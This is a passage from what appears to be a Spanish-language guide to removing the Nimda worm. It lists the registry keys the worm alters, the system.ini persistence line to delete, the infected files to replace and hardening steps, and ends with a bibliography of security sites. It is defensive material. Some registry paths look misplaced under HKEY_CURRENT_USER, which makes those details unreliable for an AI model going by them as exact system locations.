HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
ShowSuperHidden
El Nimda crea la siguiente llave:
HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfac
es
Todas las claves de la siguiente llave son borradas para desactivar la seguridad de los
recursos compartidos:
HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Sec
urity
Borra la siguiente linea del system.ini y reinicia el PC:
[boot]
shell=explorer.exe load.exe -dontrunold
Los siguientes archivos son infectados por el Nimda, debes borrarlos y reponerlos de otro
PC o de un Backup
MMC.EXE
LOAD.EXE
RICHED20.DLL
ADMIN.DLL
WININIT.INI
y borra todos los archivos de los directorios temporales:
\Temp\
\Windows\Temp\
\Documents and Settings\%Username%\Local Settings\Temp
Ahora reinicia.
Borra los *.eml, *.nws infectados
Borra el código JavaScript añadido al final de los HTM, HTML, ASP.
Desactiva la cuenta "Guest" (invitado) y quítale los permisos de administrador.
Comprueba los permisos de los recursos compartidos.
Actualiza tu PC con los parches adecuados.
BIBLIOGRAFIA Y AGRADECIMIENTOS
Kriptópolis: www.kriptopolis.com Portal de seguridad y divulgación.
The Wild List Organitation International: www.wildlist.org Organización de alerta sobre virus
CyruxNET: www.cjb.net Portal de información sobre fallos informáticos.
guninski: http://www.guninski.com/javaea.html Pagina de guninski.Cazador de bugs.
securityfocus: http://www.securityfocus.com Portal sobre seguridad.
Microsoft: www.microsoft.com Sin comentarios.
Pandasoftware: www.pandasoftware.es Idem
Slipstick Systems: www.slipstick.com Empresa de software de antivirus.
hacksoft: www.hacksoft.com.pe Empresa peruana de antivirus.
CERT: www.cert.org Centro de seguridad en internet
GFI: www.gfisoftware.com Empresa de software de seguridad
cknown: www.cknow.com Idem.
Mis agradecimientos a: Carlos Perez por guiarme entre la inmensa información, Antonio Valls
Obrer por su interés y sus busquedas de última hora, Pablo Lemos Ochando y Francisco Garcia
Montaner por su ayuda y consejos.